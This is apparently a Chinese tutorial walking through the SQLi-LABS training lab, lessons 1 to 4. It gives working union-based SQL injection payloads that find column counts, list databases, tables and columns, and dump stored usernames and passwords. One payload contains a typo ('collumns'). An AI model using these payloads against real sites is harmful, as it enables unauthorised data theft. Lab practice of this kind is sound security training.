SQLI-LABS(二)
SQLI-LABS(二)
前四关流程:
1、判断是否存在sql注入漏洞
2、使用order by 查看列数
3、使用联合查询判断回显位置
4、在回显位置处注入sql语句进行查询
**我们可以在sql文件中每一关文件中的index.php中写入代码
echo $sql;
echo “< br >”;
以方便做题时查看sql语句;
**
Less-1:
**
1、判断:?id=1’
在这里插入图片描述
出现报错,证明存在sql漏洞,其中
报错信息 为’‘1’’ LIMIT 0,1’ at line 1
sql语句 为SELECT * FROM users WHERE id=‘1’’ LIMIT 0,1
知以’闭合参数;
2、列数:?id=1’ order by x–+ (其中x输入数字代表哪一列,是用二分法缩小范围,x之后是两个减号与加号,代表注释),本题查询为列有1,2,3;
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
3、判断回显位置:?id=0’ union select 1,2,3–+ ,本题判断回显位置为2和3的位置(之后的注入语句均在这两个位置上,即替换2和3);
在这里插入图片描述
4、查询数据库:?id=0’ union select 1,(select group_concat(schema_name) from information_schema.schemata),3–+
在这里插入图片描述
5、查询某一个库(以security为例)中的表名:?id=0’ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),3–+
在这里插入图片描述
6、查security中users中的列:?id=0’ union select 1,(select group_concat( column_name) from information_schema.collumns where table_name=‘users’),3–+
在这里插入图片描述
7、具体查users中的username和password:?id=0’ union select 1,(select group_concat(concat_ws(’~’,username,password))from security.users),3–+
在这里插入图片描述
常用函数:
system_user()
user()
current_user()
databases()
version()
@@datadir 查看安装路径
@@version_compile_os 查看操作系统
group_concat() 将所有数据拼接为一行进行显示 只可limit 0,1
concat_ws(’~’,A,B) A,B为想要查看的内容,此函数表示将数据A与B用~对应起来
语句分析:
1、select * from users limit x,y;
–> x,y均为数字,其中x表示从第x+1个开始列出, y表示显示几个数据
2、select * from users where id=x;
–>x为数字,表示显示id为x的数据
3、select * from users order by x;
–>x为数字,表示数据按照第x列顺序排出(数字顺序/字母顺序)
Less-2:
1、判断:
?id=1
在这里插入图片描述
在这里插入图片描述
未报错,sql语句正确,得知为整数时正确
?id=1’
在这里插入图片描述
出现报错,证明存在sql漏洞,其中
报错信息 为 ‘’ LIMIT 0,1’ at line 1
sql语句 为 SELECT * FROM users WHERE id=1’ LIMIT 0,1
得知为整型注入
之后的操作只需将第一关中的单引号去掉即可
Less-3:
1、判断:
?id=1
在这里插入图片描述
在这里插入图片描述
为报错,sql语句正确,得知闭合参数为‘)
?id=1’
在这里插入图片描述
出现报错,证明存在sql漏洞,其中
报错信息 为 ‘‘1’’) LIMIT 0,1’ at line 1
sql语句 为 SELECT * FROM users WHERE id=(‘1’’) LIMIT 0,1
得知闭合参数为’)
之后的操作只需将第一关中的单引号改为’)即可
Less-4:
1、判断:
?id=1
在这里插入图片描述
在这里插入图片描述
未报错,sql语句正确,得知闭合参数为")
?id=1’
在这里插入图片描述
?id=1" (此处是双引号)
在这里插入图片描述
出现报错,存在sql注入漏洞,其中
报错信息 为 ‘“1"”) LIMIT 0,1’ at line 1
sql语句 为 SELECT * FROM users WHERE id=(“1"”) LIMIT 0,1
得知闭合参数为")
之后的操作只需将第一关中单引号改为双引号加一个括号即可
注意 : 所有的符号均是在英文状态下的,文本中有些地方copy过来就成了这个样子,望体谅。
今天的内容就到这里啦,祝大家学习愉快!
SQLI-LABS(二)相关推荐
- SQLi LABS Less 27a 联合注入+布尔盲注+时间盲注
第27a关是双引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.布尔盲注.时间盲注三种解题方式. 其他 SQLi LABS 靶场的解题步 ...
- SQLi LABS Less 27 联合注入+报错注入+布尔盲注+时间盲注
第27关是单引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.报错注入.布尔盲注.时间盲注四种解题方式. 其他 SQLi LABS 靶场 ...
- SQLi LABS Less 26a 联合注入+布尔盲注
第26a关是单引号+括号的字符型注入: 后台过滤了关键字( and or ),注释(/* # -- /),空格: 这篇文章提供联合注入.布尔盲注.两种解题方式. SQLi LABS其他关卡可以 ...
- SQLi LABS Less 25 联合注入+报错注入+布尔盲注
第二十五关单引号字符型注入: 过滤了关键字(and.or),可以使用双写绕过: 这篇文章提供了联合注入.报错注入.布尔盲注三种解题方法. SQLi LABS 其余关卡可参考我的专栏:SQLi-LABS ...
- 【less-24】基于SQLI的二次注入
实验声明:本实验教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险! 实验目的 实验环境 实验原理 二次排序注入思路: 实验步骤 第一步 在kali平台上使用Firefox访问SQLI的 ...
- sqli——labs初学者通关详
目录 Less-1 GET-Error based-Single quotes-String(基于错误的GET单引号字符型注入) Less-2 GET-Error based- Intiger bas ...
- SQLi LABS Less-26 联合注入+报错注入+布尔盲注+时间盲注
第26关是单引号字符型注入: 后台过滤了关键字( and or ),注释(/* # -- /),空格: 这篇文章提供联合注入.报错注入.布尔盲注.时间盲注四种解题方式. 目录 一.功能分析 二 ...
- SQLi LABS Less 25a 联合注入+布尔盲注+时间盲注
第25a关是数值型注入: 后台过滤了关键字(and.or),可以双写绕过: 这篇文章提供联合注入.布尔盲注.时间盲注三种解题方式. SQLi-LABS 其余关卡,可以参考我的专栏:SQLi-LABS ...
- SQLi LABS Less 23 联合注入+报错注入+布尔盲注
第23关是单引号字符型注入: 过滤了注释,使用闭合引号来绕过: 这篇文章提供联合注入.报错注入.布尔盲注三种解题方式. 一.功能分析 这一关是一个简单的查询功能,在地址栏输入id,后台根据id查询数据 ...
- SQLi LABS Less 16 布尔盲注
第十六关是双引号+括号的字符型注入,推荐使用布尔盲注 一.功能分析 一个简单的登录功能,输入用户名和密码点击登录,后台接收参数查询数据库. 如果用户名和密码存在,页面提示登录成功. 如果用户名和密码不 ...
最新文章
- tensorflow with求导_3.4tensorflow2.x自动求导原理函数详解
- 如何用c语言读取硬盘串号_如何用C语言实现OOP
- ES6之Promise
- SQL Server加密存储过程的破解
- php cpu mac,PHP 获得计算机的唯一标识[CPU,网卡 MAC地址]
- TextView滚动功能的实现
- 如何优雅地用ARM开发板搭建服务器
- MySQL存储过程(一)——存储过程理论基础
- 【一天一个C++小知识】010.malloc/free和new/delete
- svn 创建分支,合并分支
- win7 VS2010 Visual Assist X破解
- 一元三次方程的解法史
- 微软又犯二了!WebApi中不支持MVC的OutputCache
- PHP array_column() 函数
- 对话职业经理人阿朱:程序员转型期的职业选择
- FPGA入门-腾讯云布道师团队-专题视频课程
- 《跨社交网络的隐私图片分享框架》EI
- zookeeper基本讲解(Java版,真心不错)
- 记录写博文用到的一些工具
- Received HTTP code 404 from proxy after CONNECT
热门文章
- GitHub上如何删除fork别人的repository
- 【mysql问题】can't connect to mysql server on 'localhost' (10060)
- Wamp修改httpd.conf中的DocumentRoot不生效解决办法
- VS Code解决Go相关工具无法安装问题
- 服务器压力测试怎么做_做手游怎么选服务器?
- java每轮排序结果_【算法队列面试题】面试问题:java选择题… - 看准网
- 【论文阅读】SIR模型下网络中多信息源检测 2014-IEEE
- 固定资产分类与代码_促进产业技术升级换代!固定资产加速折旧优惠政策了解一下...
- linux系统恢复上一次,如何将您的Ubuntu Linux系统恢复到其上一个状态
- python paramiko exec_command()和invoke_shell()